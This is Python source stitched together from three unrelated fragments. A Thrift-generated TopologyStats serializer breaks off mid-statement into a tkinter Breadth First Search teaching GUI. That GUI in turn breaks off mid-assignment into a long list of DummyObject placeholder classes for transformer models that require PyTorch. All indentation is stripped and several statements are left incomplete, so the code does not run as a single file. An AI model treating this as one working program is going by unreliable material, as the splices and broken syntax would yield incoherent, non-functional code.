iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TopologyStats')
if self.window_to_emitted is not None:
oprot.writeFieldBegin('window_to_emitted', TType.MAP, 1)
oprot.writeMapBegin(TType.STRING, TType.I64, len(self.window_to_emitted))
for kiter350,viter351 in self.window_to_emitted.items():
oprot.writeString(kiter350.encode('utf-8'))
oprot.writeI64(viter351)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.window_to_transferred is not None:
oprot.writeFieldBegin('window_to_transferred', TType.MAP, 2)
oprot.writeMapBegin(TType.STRING, TType.I64, len(self.window_to_transferred))
for kiter352,viter353 in self.window_to_transferred.items():
oprot.writeString(kiter352.encode('utf-8'))
oprot.writeI64(viter353)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.window_to_complete_latencies_ms is not None:
from tkinter import *
import tkinter.font as font
from functions import *
from tkinter import messagebox
from tkinter.filedialog import askopenfilename
import string
from tkinter.ttk import Separator, Style
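# MyMenu, MyButton and MyEntry used throughout the class below are custom widget helpers,
# expected to come from the local functions module imported above.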
# Main Application Class
class BreadthFirstSearch:
def __init__(self, master):
self.master = master
master.geometry("900x550")
master.title("Breadth First Search")
master.configure(bg="white")
master.iconbitmap("images/bfs-icon.ico")
# Fonts
font1 = font.Font(family='Helvetica', size=10, weight='bold')
font2 = font.Font(family="Times", size=10, slant="italic", weight='bold')
font3 = font.Font(family="Komika", size=10, slant="italic", weight='bold')
# Color
self.color_menu = "#FCA85A"
self.color_main_content = "#FDE69F"
self.color_red = "#ED5C5E"
# Instances
self.alphabets = list(string.ascii_uppercase + string.ascii_lowercase)
self.optionButton = False
self.optionInput = 0
self.isFileRead = False
self.isFileSelected = False
self.listOfFile = list()
self.filepath = ""
self.numVertices = 0 # Default at Runtime is 0
self.column = 0
self.row = 0
self.isMatrixValide = True # To check whether the matrix contains only 1 and 0
self.NameVertices = list() # Names Of Vertices
self.NameVerticesIndex = 0
self.isNameOk = False
self.isMatrixOk = False
self.start = ""
self.end = ""
# Images
self.QuestionImage = PhotoImage(file="images/problem-solving.png")
self.InputImage = PhotoImage(file="images/input.png")
self.ChoiceImage = PhotoImage(file="images/choose.png")
self.ProcessingImage = PhotoImage(file="images/planning.png")
self.IntroductionImage = PhotoImage(file="images/large.png")
self.GraphImage = PhotoImage(file="images/graph.png")
self.UploadImage = PhotoImage(file="images/upload.png")
self.PathFindingImage = PhotoImage(file="images/road-map.png")
self.RunImage = PhotoImage(file="images/button_run.png")
self.ClearImage = PhotoImage(file="images/button_clear.png")
self.ButtonStart = PhotoImage(file="images/button_start.png")
self.ButtonValidate = PhotoImage(file="images/button_validate.png")
self.ButtonOpenFile = PhotoImage(file="images/button_open-file.png")
self.ButtonReadFile = PhotoImage(file="images/button_read-file.png")
self.ButtonBack = PhotoImage(file="images/button_back.png")
self.ButtonNext = PhotoImage(file="images/button_next.png")
self.ButtonRunAlgorithm = PhotoImage(file="images/button_run-algorithm.png")
self.ButtonExit = PhotoImage(file="images/button_exit.png")
self.ButtonReset = PhotoImage(file="images/button_reset.png")
## Declaring Frames
self.frameLeft = Frame(master, bg=self.color_menu)
self.frameLeft.place(relx=0, rely=0, relwidth=0.2, relheight=1)
self.frameRight = Frame(master, bg=self.color_main_content)
self.frameRight.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
# self.frameRight.place_forget()
self.frameRight1 = Frame(master, bg=self.color_main_content)
self.frameRight1.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight1.place_forget()
self.frameRight2 = Frame(master, bg=self.color_main_content)
self.frameRight2.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight2.place_forget()
self.frameRight4 = Frame(master, bg=self.color_main_content)
self.frameRight4.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight4.place_forget()
self.frameRight3 = Frame(master, bg=self.color_main_content)
self.frameRight3.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight3.place_forget()
self.frameRight4 = Frame(master, bg=self.color_main_content)
self.frameRight4.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight4.place_forget()
## Putting the menu of the program on the leftframe
# Question Button
self.questionButton = MyMenu(self.frameLeft, 0, 0, 1, 0.25, self.color_main_content, self.QuestionImage)
# Input Button
self.inputButton = MyMenu(self.frameLeft, 0, 0.25, 1, 0.25, self.color_menu, self.InputImage)
# Choice Button
self.choiceButton = MyMenu(self.frameLeft, 0, 0.5, 1, 0.25, self.color_menu, self.ChoiceImage)
# Processing Button
self.processingButton = MyMenu(self.frameLeft, 0, 0.75, 1, 0.25, self.color_menu, self.ProcessingImage)
## Starting working on the main content => frameRight
text_intro = "What is Breadth First Search Algorithm ?"
self.introLabel = LabelFrame(self.frameRight, bg=self.color_main_content, fg=self.color_red, text=text_intro,
bd=0)
self.introLabel['font'] = font1
self.introLabel.place(relx=0.01, rely=0.2, relwidth=0.95, relheight=0.45)
self.textLabel = Label(self.introLabel, text=Text, justify=LEFT, wraplength=180, image=self.IntroductionImage,
compound=LEFT, padx=10, bg=self.color_main_content, fg=self.color_red)
self.textLabel.place(relx=0, rely=0)
self.textLabel['font'] = font2
# Button Start
self.startButton = MyButton(self.frameRight, 0.8, 0.85, 0.2, 0.15, self.color_main_content, self.ButtonStart,
lambda event: self.NextPage(event, self.frameRight, self.frameRight1,
self.questionButton, self.inputButton))
## Starting working on the main content => frameRight1
text_choice_label = "What is your choice ?"
self.choicesLabel = LabelFrame(self.frameRight1, bg=self.color_main_content, fg=self.color_red,
text=text_choice_label,
bd=0)
self.choicesLabel['font'] = font1
self.choicesLabel.place(relx=0.1, rely=0.1, relwidth=0.8, relheight=0.2)
self.separator1 = Separator(self.frameRight1, orient="horizontal")
self.separator1.place(relx=0.1, rely=0.25, relheight=0.002, relwidth=0.8)
self.separator2 = Separator(self.frameRight1, orient="vertical")
self.separator2.place(relx=0.9, rely=0.1, relheight=0.15, relwidth=0.002)
self.var1 = IntVar()
text_choice1 = "PathFinding Problem"
text_choice2 = "Graph"
self.optionMenu1 = Radiobutton(self.choicesLabel, text=text_choice1, variable=self.var1, value=1,
bg=self.color_main_content,
activebackground=self.color_main_content)
self.optionMenu1['font'] = font3
self.optionMenu1.place(relx=0.07, rely=0)
self.optionMenu2 = Radiobutton(self.choicesLabel, text=text_choice2, variable=self.var1, value=2,
bg=self.color_main_content,
activebackground=self.color_main_content)
self.optionMenu2['font'] = font3
self.optionMenu2.place(relx=0.07, rely=0.3)
# Pathfinding Section #
# Section of Pathfinding Import => self.optionInput = 1
self.pathLabel = LabelFrame(self.frameRight1, bg=self.color_main_content, fg=self.color_red, bd=0)
self.pathLabel.place(relx=0.1, rely=0.31, relheight=0.6, relwidth=0.8)
self.pathLabel.place_forget()
self.choicesLabelImage1 = Label(self.pathLabel, image=self.PathFindingImage, compound=LEFT,
bg=self.color_main_content)
self.choicesLabelImage1.place(relx=0, rely=0.1, relwidth=0.3)
self.choicesLabel2 = Label(self.pathLabel, bg=self.color_main_content, bd=0)
self.choicesLabel2.place(relx=0.31, rely=0, relwidth=0.69, relheight=1)
# Entries for the Pathfinding option:
self.numberOfColumns = Label(self.choicesLabel2, text="The Number of columns ", bg=self.color_main_content,
anchor=W,
fg=self.color_red)
self.numberOfColumns.place(relx=0.02, rely=0.05, relwidth=0.95, relheight=0.1)
self.numberOfColumns['font'] = font3
self.columntext = "Enter the number of columns ( example: 16 ) "
self.numberOfColumnsEntry = MyEntry(self.choicesLabel2, 0.02, 0.15, 0.95, 0.1, self.color_main_content, "black",
font2, self.columntext)
self.numberOfRows = Label(self.choicesLabel2, text="The Number of rows ", bg=self.color_main_content, anchor=W,
fg=self.color_red)
self.numberOfRows.place(relx=0.02, rely=0.3, relwidth=0.95, relheight=0.1)
self.numberOfRows['font'] = font3
self.rowtext = "Enter the number of rows ( example: 10 ) "
self.numberOfRowsEntry = MyEntry(self.choicesLabel2, 0.02, 0.4, 0.95, 0.1, self.color_main_content, "black",
font2, self.rowtext)
# Adding the validate Button
self.validateButton = MyButton(self.pathLabel, 0.55, 0.75, 0.2, 0.2, self.color_main_content,
self.ButtonValidate, self.validatePath)
# Validation text
self.validatepathText = Label(self.choicesLabel2, text="", bg=self.color_main_content, fg=self.color_red)
self.validatepathText.place(relx=0.02, rely=0.53, relwidth=0.8, relheight=0.2)
self.validatepathText['font'] = font2
# Adding the commands for radio Button
self.optionMenu1.configure(command=lambda num=1: self.inputChoice(num))
self.optionMenu2.configure(command=lambda num=2: self.inputChoice(num))
# Graph Section #
self.graphLabel = LabelFrame(self.frameRight1, bg=self.color_main_content, fg=self.color_red, bd=0)
self.graphLabel.place(relx=0.1, rely=0.3, relheight=0.9, relwidth=0.8)
self.graphLabel.place_forget()
text_choice_graph = "What is The type of Entry ?"
self.graphTextLabel = Label(self.graphLabel, text=text_choice_graph, bg=self.color_main_content,
fg=self.color_red,
anchor=W)
self.graphTextLabel.place(relx=0, rely=0, relwidth=0.8, relheight=0.05)
self.graphTextLabel['font'] = font1
# Option type Entry for graph
text_choice_graph1 = "Number of Vertices"
text_choice_graph2 = "File Entry (Matrix)"
self.var2 = IntVar()
self.optionGraphType1 = Radiobutton(self.graphLabel, text=text_choice_graph1, variable=self.var2, value=1,
bg=self.color_main_content, activebackground=self.color_main_content)
self.optionGraphType1.place(relx=0.05, rely=0.07, relheight=0.05)
self.optionGraphType1['font'] = font2
self.optionGraphType2 = Radiobutton(self.graphLabel, text=text_choice_graph2, variable=self.var2, value=2,
bg=self.color_main_content, activebackground=self.color_main_content)
self.optionGraphType2.place(relx=0.05, rely=0.15, relheight=0.05)
self.optionGraphType2['font'] = font2
self.optionGraphType1.configure(command=lambda num=1: self.graphChoice(num))
self.optionGraphType2.configure(command=lambda num=2: self.graphChoice(num))
self.graphLabelImage1 = Label(self.graphLabel, image=self.GraphImage, compound=LEFT,
bg=self.color_main_content)
self.graphLabelImage1.place(relx=0, rely=0.3, relwidth=0.3)
self.graphLabelImage1.place_forget()
self.graphLabelImage2 = Label(self.graphLabel, image=self.UploadImage, compound=LEFT,
bg=self.color_main_content)
self.graphLabelImage2.place(relx=0, rely=0.3, relwidth=0.3)
self.graphLabelImage2.place_forget()
self.graphLabel2 = Label(self.graphLabel, bg=self.color_main_content, bd=0)
self.graphLabel2.place(relx=0.31, rely=0.3, relwidth=0.69, relheight=1)
self.graphLabel2.place_forget()
self.graphLabel3 = Label(self.graphLabel, bg=self.color_main_content, bd=0)
self.graphLabel3.place(relx=0.31, rely=0.3, relwidth=0.69, relheight=1)
self.graphLabel3.place_forget()
# Entry for the graph option:
# Section of vertices Import => self.optionInput = 2
self.numberOfVertices = Label(self.graphLabel2, text="The Number of vertices ", bg=self.color_main_content,
anchor=W,
fg=self.color_red)
self.numberOfVertices.place(relx=0.02, rely=0.05, relwidth=0.95, relheight=0.1)
self.numberOfVertices['font'] = font3
self.numVertivesEntryText = "Enter the number of vertices ( example: 10 ) "
self.numberOfVerticesEntry = MyEntry(self.graphLabel2, 0.02, 0.15, 0.95, 0.1, self.color_main_content, "black",
font2, self.numVertivesEntryText)
self.validateVerticesButton = MyButton(self.graphLabel2, 0.3, 0.3, 0.3, 0.12, self.color_main_content,
self.ButtonValidate, self.validateVertices)
self.validateVerticesButtonMessage = Label(self.graphLabel2, text="", bg=self.color_main_content,
fg=self.color_red)
self.validateVerticesButtonMessage.place(relx=0.3, rely=0.5, relheight=0.1, relwidth=0.3)
self.validateVerticesButtonMessage['font'] = font2
# Section of Matrix Import => self.optionInput = 3
self.tipText = "Tip: Matrix row should look like: 1 0 1 0 0 1"
self.tiptext = Label(self.graphLabel3, text=self.tipText, bg=self.color_main_content, fg=self.color_red)
self.tiptext.place(relx=0, rely=0.04, relheight=0.1, relwidth=1)
self.tiptext['font'] = font1
self.titleOfFile = Label(self.graphLabel3, text="No Path Selected..", bg=self.color_main_content)
self.titleOfFile.place(relx=0.02, rely=0.15, relwidth=0.95, relheight=0.1)
self.titleOfFile['font'] = font3
self.openFileButton = MyButton(self.graphLabel3, 0.13, 0.27, 0.3, 0.15, self.color_main_content,
self.ButtonOpenFile, self.OpenFile)
self.readFileButton = MyButton(self.graphLabel3, 0.55, 0.27, 0.3, 0.17, self.color_main_content,
self.ButtonReadFile,
self.ReadFile)
self.readMessage = Label(self.graphLabel3, text="", bg=self.color_main_content, fg=self.color_red,
justify=CENTER)
self.readMessage.place(relx=0.1, rely=0.45, relheight=0.06, relwidth=0.75)
self.readMessage['font'] = font2
# Adding the next Button to frameRight1
self.inputNextButton = MyButton(self.frameRight1, 0.88, 0.9, 0.12, 0.1, self.color_main_content,
self.ButtonNext,
self.InputNext)
self.inputNextButton.place_forget()
# Adding The Back Button to frameRight1
self.inputBackButton = MyButton(self.frameRight1, 0.02, 0.9, 0.1, 0.1, self.color_main_content, self.ButtonBack,
self.InputBack)
## Starting working on the main content => frameRight2
text_name_choice = "Type of vertices name"
self.nameVerticeOptionLabel = LabelFrame(self.frameRight2, bg=self.color_main_content, fg=self.color_red,
text=text_name_choice,
bd=0)
self.nameVerticeOptionLabel['font'] = font2
self.nameVerticeOptionLabel.place(relx=0.1, rely=0.1, relwidth=0.8, relheight=0.15)
self.var3 = IntVar()
text_name_option1 = "Numerical"
text_name_option2 = "Alphabetical"
text_name_option3 = "Customizable"
self.optionNameMenu1 = Radiobutton(self.nameVerticeOptionLabel, bg=self.color_main_content, variable=self.var3,
value=1, activebackground=self.color_main_content, text=text_name_option1,
anchor=W)
self.optionNameMenu1['font'] = font3
self.optionNameMenu1.place(relx=0.05, rely=0.05, relheight=0.22, relwidth=0.4)
self.optionNameMenu2 = Radiobutton(self.nameVerticeOptionLabel, bg=self.color_main_content, variable=self.var3,
value=2, activebackground=self.color_main_content, text=text_name_option2,
anchor=W)
self.optionNameMenu2['font'] = font3
self.optionNameMenu2.place(relx=0.05, rely=0.35, relheight=0.22, relwidth=0.4)
self.optionNameMenu3 = Radiobutton(self.nameVerticeOptionLabel, bg=self.color_main_content, variable=self.var3,
value=3, activebackground=self.color_main_content, text=text_name_option3,
anchor=W)
self.optionNameMenu3['font'] = font3
self.optionNameMenu3.place(relx=0.05, rely=0.65, relheight=0.22, relwidth=0.4)
# command of the option menu
self.optionNameMenu1.configure(command=lambda num=1: self.nameOption(num))
self.optionNameMenu2.configure(command=lambda num=2: self.nameOption(num))
self.optionNameMenu3.configure(command=lambda num=3: self.nameOption(num))
# Name for customizable option
self.customizableNameOption = LabelFrame(self.frameRight2, bd=0, bg=self.color_main_content, text="")
self.customizableNameOption.place(relx=0.1, rely=0.3, relwidth=0.8, relheight=0.55)
self.customizableNameOption.place_forget()
text_name = "The name of Vertices"
self.labelName = Label(self.customizableNameOption, text=text_name, bg=self.color_main_content,
fg=self.color_red,
anchor=W)
self.labelName.place(relx=0.1, rely=0, relwidth=0.8, relheight=0.1)
self.labelName['font'] = font1
self.text_name_entry = "Enter the name of the Vertices separated by ',' (Max 2 characters by vertex)"
self.labelNameEntry = MyEntry(self.customizableNameOption, 0.1, 0.1, 0.8, 0.15, self.color_main_content,
"black",
font2, self.text_name_entry)
self.labelNameMessage = Label(self.customizableNameOption, text="", bg=self.color_main_content,
fg=self.color_red)
self.labelNameMessage.place(relx=0.1, rely=0.27, relheight=0.13, relwidth=0.5)
self.validateNameVerticesButton = MyButton(self.customizableNameOption, 0.7, 0.27, 0.2, 0.15,
self.color_main_content,
self.ButtonValidate, self.validateCustomizableName)
self.matrixOfGraphLabel1 = LabelFrame(self.customizableNameOption, bg=self.color_main_content, bd=0)
self.matrixOfGraphLabel1.place(relx=0.1, rely=0.42, relheight=0.55, relwidth=0.8)
# Creating The label that contains the text
self.matrixLabel1 = Label(self.matrixOfGraphLabel1, text="Matrix Entry", bg=self.color_main_content,
fg=self.color_red,
bd=0, anchor=W)
self.matrixLabel1.place(relx=0, rely=0.05, relheight=0.1, relwidth=0.8)
self.matrixLabel1['font'] = font1
self.text_matrix_1 = "Please Enter matrix separated by ','(example: 0010,1101,0101,1111 => 4*4 matrix)"
self.matrixEntry1 = MyEntry(self.matrixOfGraphLabel1, 0, 0.16, 1, 0.15, self.color_main_content, "black",
font.Font(family="Times", size=9, slant="italic", weight='bold'),
self.text_matrix_1)
self.validateMatrixMessage1 = Label(self.matrixOfGraphLabel1, bg=self.color_main_content, text="",
fg=self.color_red)
self.validateMatrixMessage1['font'] = font3
self.validateMatrixMessage1.place(relx=0, rely=0.37, relheight=0.22, relwidth=0.7)
self.validateMatrixEntry1 = MyButton(self.matrixOfGraphLabel1, 0.75, 0.35, 0.25, 0.25, self.color_main_content,
self.ButtonValidate,
lambda event: self.validateCustomizableMatrix(event, self.matrixEntry1,
self.validateMatrixMessage1))
# validation message
# Starting the code the normal form Name here is Numerical or Alphabetical
self.matrixOfGraphLabel = LabelFrame(self.frameRight2, bg=self.color_main_content, text="", bd=0)
self.matrixOfGraphLabel.place(relx=0.1, rely=0.3, relwidth=0.8, relheight=0.3)
self.matrixOfGraphLabel.place_forget()
self.matrixLabel =
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
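# Each class in this block is a backend placeholder: instantiating it calls requires_backends,
# which raises an error unless the "torch" backend (PyTorch) is installed.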
class ProphetNetEncoder(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ProphetNetForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ProphetNetForConditionalGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ProphetNetModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ProphetNetPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RagModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RagPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RagSequenceForGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RagTokenForGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
REALM_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RealmEmbedder(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmForOpenQA(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmKnowledgeAugEncoder(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmReader(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmRetriever(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmScorer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_realm(*args, **kwargs):
requires_backends(load_tf_weights_in_realm, ["torch"])
REFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = None
class ReformerAttention(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerModelWithLMHead(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
REMBERT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RemBertForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForTokenClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_rembert(*args, **kwargs):
requires_backends(load_tf_weights_in_rembert, ["torch"])
RETRIBERT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RetriBertModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RetriBertPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
ROBERTA_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RobertaForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForTokenClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
ROFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RoFormerForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForTokenClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_roformer(*args, **kwargs):
requires_backends(load_tf_weights_in_roformer, ["torch"])
SEGFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SegformerDecodeHead(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerForImageClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerForSemanticSegmentation(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SEW_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SEWForCTC(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SEW_D_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SEWDForCTC(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWDForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWDModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWDPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SpeechEncoderDecoderModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SPEECH_TO_TEXT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class Speech2TextForConditionalGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class Speech2TextModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class Speech2TextPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class Speech2Text2ForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class Speech2Text2PreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SPLINTER_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SplinterForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SplinterLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SplinterModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SplinterPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SQUEEZEBERT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SqueezeBertForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertForTokenClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertModule(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
